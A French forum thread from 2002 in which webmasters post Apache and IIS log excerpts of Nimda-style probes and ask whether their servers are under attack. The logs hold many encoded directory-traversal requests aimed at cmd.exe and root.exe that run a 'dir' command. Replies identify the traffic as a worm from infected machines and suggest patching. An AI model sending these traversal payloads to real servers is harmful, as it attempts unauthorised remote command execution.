C bien une tentative de contamination Nimda ?

C bien une tentative de contamination Nimda ? - Windows & Software

Marsh Posté le 07-05-2002 à 15:18:13    

Dans mes logs apache j'ai ca :  
193.252.2.7 - - [06/May/2002:19:53:07 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 319
193.252.2.7 - - [06/May/2002:19:53:11 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 317
193.252.2.7 - - [06/May/2002:19:53:14 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
193.252.2.7 - - [06/May/2002:19:53:14 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
193.252.2.7 - - [06/May/2002:19:53:15 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
193.252.2.7 - - [06/May/2002:19:53:15 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358
193.252.2.7 - - [06/May/2002:19:53:15 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358
193.252.2.7 - - [06/May/2002:19:53:16 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 374
193.252.2.7 - - [06/May/2002:19:53:16 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:19:53:16 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:19:54:02 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:19:54:12 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:20:19:02 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 319
193.252.2.7 - - [06/May/2002:20:19:02 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 317
193.252.2.7 - - [06/May/2002:20:19:03 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
193.252.2.7 - - [06/May/2002:20:19:03 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
193.252.2.7 - - [06/May/2002:20:19:04 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
193.252.2.7 - - [06/May/2002:20:19:05 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358
193.252.2.7 - - [06/May/2002:20:19:05 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358
193.252.2.7 - - [06/May/2002:20:19:06 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 374
193.252.2.7 - - [06/May/2002:20:19:06 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:20:19:06 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:20:19:07 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:20:19:07 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:20:19:08 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 324
193.252.2.7 - - [06/May/2002:20:19:08 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 324
193.252.2.7 - - [06/May/2002:20:19:09 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
193.252.2.7 - - [06/May/2002:20:19:09 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
 
C bizard comme requette non ?


---------------
J'avait dit à gauche... François  
Reply

Marsh Posté le 07-05-2002 à 15:18:13   

Reply

Marsh Posté le 07-05-2002 à 15:19:25    

C'est fort possible. Fait une recherche, il y a au moins un autre sujet là-desus dernièrement.

Reply

Marsh Posté le 07-05-2002 à 15:26:42    

Oui c'est une tentative.


---------------
APB
Reply

Marsh Posté le 07-05-2002 à 15:27:33    

193.252.2.7 et lui la j'en fè quoi je previen wanadoo ou quoi ?


---------------
J'avait dit à gauche... François  
Reply

Marsh Posté le 12-05-2002 à 21:14:31    

So do I :
 
 
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)  
2002-05-12 00:28:54 80.14.229.234 - 80.14.119.57 80 GET /scripts/root.exe /c+dir 401 -
2002-05-12 00:28:55 80.14.229.234 - 80.14.119.57 80 GET /MSADC/root.exe /c+dir 403 -
2002-05-12 00:28:56 80.14.229.234 - 80.14.119.57 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2002-05-12 00:28:57 80.14.229.234 - 80.14.119.57 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2002-05-12 00:28:58 80.14.229.234 - 80.14.119.57 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-05-12 00:28:59 80.14.229.234 - 80.14.119.57 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-05-12 00:29:01 80.14.229.234 - 80.14.119.57 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-05-12 00:29:02 80.14.229.234 - 80.14.119.57 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2002-05-12 00:29:03 80.14.229.234 - 80.14.119.57 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
2002-05-12 00:29:04 80.14.229.234 - 80.14.119.57 80 GET /scripts/winnt/system32/cmd.exe /c+dir 401 -
 
etc....   en effet on fait quoi on prévient Wanadoo ???

 

[jfdsdjhfuetppo]--Message édité par Jef34 le 12-05-2002 à 21:14:52--[/jfdsdjhfuetppo]

Reply

Marsh Posté le 12-05-2002 à 21:16:19    

Au fait, pour éviter la contamination, que faut-il faire ??? Mis à part Antivurus etc...

 

[jfdsdjhfuetppo]--Message édité par Jef34 le 13-05-2002 à 09:31:31--[/jfdsdjhfuetppo]

Reply

Marsh Posté le 13-05-2002 à 09:31:44    

up

Reply

Marsh Posté le 13-05-2002 à 09:49:45    

tu fais comme moi Apache + mise a jour ;)


---------------
J'avait dit à gauche... François  
Reply

Marsh Posté le 13-05-2002 à 15:52:32    

benwar a écrit a écrit :

193.252.2.7 et lui la j'en fè quoi je previen wanadoo ou quoi ?  




le gars en question est contaminé. ce n'est pas un hacker! préviens le si tu veux ou peux. inutile d'avertir abuse...


---------------
bah kestufou ?
Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed